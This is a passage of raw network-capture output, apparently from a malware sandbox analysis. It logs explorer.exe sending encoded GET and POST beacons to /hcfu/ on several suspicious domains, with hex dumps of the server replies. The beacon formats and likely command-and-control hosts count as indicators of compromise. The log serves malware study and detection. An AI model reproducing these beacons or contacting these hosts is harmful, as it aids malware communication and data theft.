Oct 24, 2022 11:06:52.303719997 CEST	354	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Oct 2022 09:06:52 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache/2 Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.7	49714	51.79.230.147	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:07:25.079505920 CEST	392	OUT	GET /hcfu/?u0Gp2vp8=e8urorjn5YtBqVBAKQkFOVgb5XRHX95iuVbYmP4qxYw81TZ13rhAoUApmzfpT8nnssMZ1gBiQNZAQWNQOMLHZ0WRUsNJ0JTIQulzNrWS92rI&5jSp=DfjdjluHJP1L6t HTTP/1.1 Host: www.malaya.live Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2022 11:07:25.387295008 CEST	393	IN	HTTP/1.1 301 Moved Permanently Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 x-redirect-by: WordPress location: http://malaya.live/hcfu/?u0Gp2vp8=e8urorjn5YtBqVBAKQkFOVgb5XRHX95iuVbYmP4qxYw81TZ13rhAoUApmzfpT8nnssMZ1gBiQNZAQWNQOMLHZ0WRUsNJ0JTIQulzNrWS92rI&5jSp=DfjdjluHJP1L6t content-length: 0 date: Mon, 24 Oct 2022 09:07:25 GMT server: LiteSpeed x-frame-options: sameorigin strict-transport-security: max-age=31536000

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.7	49715	154.209.88.140	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:07:30.921325922 CEST	394	OUT	POST /hcfu/ HTTP/1.1 Host: www.nnncb.top Connection: close Content-Length: 194 Cache-Control: no-cache Origin: http://www.nnncb.top User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.nnncb.top/hcfu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 75 30 47 70 32 76 70 38 3d 44 6b 28 59 75 69 4f 66 79 7a 52 2d 4c 4e 36 6d 4d 33 64 2d 4f 33 51 57 58 58 32 42 6b 32 51 4c 32 57 68 46 48 58 6e 74 6f 53 7a 5a 67 32 79 41 4e 56 66 5f 68 36 48 41 63 53 70 55 5a 61 76 64 77 51 4a 2d 63 66 72 35 46 36 47 47 57 6a 7e 6e 77 43 7a 45 79 74 6f 43 50 4d 55 42 47 5a 4f 4d 66 39 74 61 7a 74 69 76 67 67 76 4c 6e 6a 51 54 67 30 45 6b 4f 35 4e 42 55 37 48 6b 70 46 53 72 46 35 68 66 31 45 74 52 37 75 75 32 50 41 52 4a 47 47 51 48 55 34 38 2d 75 48 49 44 30 6a 32 68 77 59 4a 54 58 4d 79 4e 77 56 4f 77 4b 64 43 76 64 77 79 46 54 79 34 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=Dk(YuiOfyzR-LN6mM3d-O3QWXX2Bk2QL2WhFHXntoSzZg2yANVf_h6HAcSpUZavdwQJ-cfr5F6GGWj~nwCzEytoCPMUBGZOMf9taztivggvLnjQTg0EkO5NBU7HkpFSrF5hf1EtR7uu2PARJGGQHU48-uHID0j2hwYJTXMyNwVOwKdCvdwyFTy4.
Oct 24, 2022 11:07:31.212583065 CEST	394	IN	HTTP/1.1 400 Bad Request Date: Mon, 24 Oct 2022 09:07:31 GMT Server: Apache Upgrade: h2 Connection: Upgrade, close Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a Data Ascii: d404 Not Found0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.7	49716	154.209.88.140	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:07:33.150590897 CEST	395	OUT	GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=OmX4tUPXqRB8MMCbJ2d2I1QXSAa/kGMN1kVgIVLBij3Fuh3JYlWO9rbbVhNUJ+THoGRZCsrEKqKuThOHyDfP/PgcDPlZBbCCTOt+7qepiG6w HTTP/1.1 Host: www.nnncb.top Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2022 11:07:33.389906883 CEST	395	IN	HTTP/1.1 200 OK Date: Mon, 24 Oct 2022 09:07:33 GMT Server: Apache Upgrade: h2 Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Transfer-Encoding: chunked Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.7	49717	150.95.59.33	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:07:39.144342899 CEST	396	OUT	POST /hcfu/ HTTP/1.1 Host: www.majordaiyanoace.com Connection: close Content-Length: 194 Cache-Control: no-cache Origin: http://www.majordaiyanoace.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.majordaiyanoace.com/hcfu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 75 30 47 70 32 76 70 38 3d 71 6b 67 71 79 61 72 31 52 72 4f 6a 45 51 78 7a 75 64 4e 37 55 6d 31 59 55 67 50 58 6c 50 70 66 6a 48 7e 57 61 68 62 46 69 73 6f 71 31 51 32 72 49 66 75 4c 43 30 71 4e 72 4e 54 61 41 6c 49 79 6b 30 47 72 55 57 4c 2d 76 77 69 30 56 6d 47 72 64 6c 6c 69 6d 36 65 77 72 5a 59 74 55 62 61 66 6f 77 45 66 70 6d 45 64 30 37 6d 69 39 67 66 4d 74 77 4d 7a 47 57 58 79 63 35 43 53 79 57 38 31 7e 71 6a 61 54 4c 54 50 61 44 54 65 76 62 56 4b 76 75 69 67 78 76 34 6b 70 69 34 52 54 70 52 6c 4e 4b 54 6b 72 69 7e 76 70 4d 45 6a 6a 35 53 37 68 41 73 51 73 5a 6f 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=qkgqyar1RrOjEQxzudN7Um1YUgPXlPpfjH~WahbFisoq1Q2rIfuLC0qNrNTaAlIyk0GrUWL-vwi0VmGrdllim6ewrZYtUbafowEfpmEd07mi9gfMtwMzGWXyc5CSyW81~qjaTLTPaDTevbVKvuigxv4kpi4RTpRlNKTkri~vpMEjj5S7hAsQsZo.
Oct 24, 2022 11:07:39.443233013 CEST	398	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1238 date: Mon, 24 Oct 2022 09:07:39 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">Lit
Oct 24, 2022 11:07:39.443259954 CEST	398	IN	Data Raw: 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 Data Ascii: eSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.7	49718	150.95.59.33	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:07:42.287992954 CEST	399	OUT	GET /hcfu/?u0Gp2vp8=nmIKxue9fq/wPVZukOB9TkwbQhnMn+EZhkHuSgXE385x5HS1Nfm9dHmrnO7NAE1ZtguQW3vFvHO2aEKxRmVjqrDRtY5yZbLfhBI/hScq3dTS&5jSp=DfjdjluHJP1L6t HTTP/1.1 Host: www.majordaiyanoace.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2022 11:07:42.567344904 CEST	400	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1238 date: Mon, 24 Oct 2022 09:07:42 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">Lit
Oct 24, 2022 11:07:42.567365885 CEST	400	IN	Data Raw: 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 Data Ascii: eSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.7	49719	192.64.116.149	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:07:47.863508940 CEST	401	OUT	POST /hcfu/ HTTP/1.1 Host: www.bandmarket.live Connection: close Content-Length: 194 Cache-Control: no-cache Origin: http://www.bandmarket.live User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.bandmarket.live/hcfu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 75 30 47 70 32 76 70 38 3d 5a 4e 74 54 4e 68 7e 38 5a 59 4f 69 4e 73 68 4e 58 57 47 75 69 4d 54 68 46 36 63 42 77 69 4b 5f 74 61 63 57 37 55 44 54 47 79 46 6b 79 32 42 72 61 41 28 6b 79 35 6f 70 4a 43 54 62 36 58 56 53 55 71 6f 32 74 72 74 32 6e 43 6a 4b 48 6c 54 72 75 35 32 41 44 74 31 4b 39 71 53 58 28 79 49 48 77 6b 4d 79 79 6e 35 5a 6a 59 49 30 53 45 47 4b 78 70 38 37 6c 49 45 70 47 58 77 70 33 66 6d 4d 6b 39 67 46 48 6d 55 39 51 78 32 63 68 41 47 72 54 67 49 56 6d 55 6b 45 4e 66 57 4f 37 65 32 65 4f 39 6b 6a 4f 56 43 49 7e 43 64 6b 33 39 4c 65 73 53 53 64 68 55 30 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=ZNtTNh~8ZYOiNshNXWGuiMThF6cBwiK_tacW7UDTGyFky2BraA(ky5opJCTb6XVSUqo2trt2nCjKHlTru52ADt1K9qSX(yIHwkMyyn5ZjYI0SEGKxp87lIEpGXwp3fmMk9gFHmU9Qx2chAGrTgIVmUkENfWO7e2eO9kjOVCI~Cdk39LesSSdhU0.
Oct 24, 2022 11:07:48.139781952 CEST	402	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Oct 2022 09:07:47 GMT Server: Apache Content-Length: 688 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4e 75 6e 69 74 6f 3a 34 30 30 2c 37 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 56 61 72 65 6c 61 2b 52 6f 75 6e 64 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 75 62 62 6c 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 75 62 62 6c 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 75 62 62 6c 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 75 62 62 6c 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 75 62 62 6c 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0a 20 20 3c 70 3e 49 74 20 6c 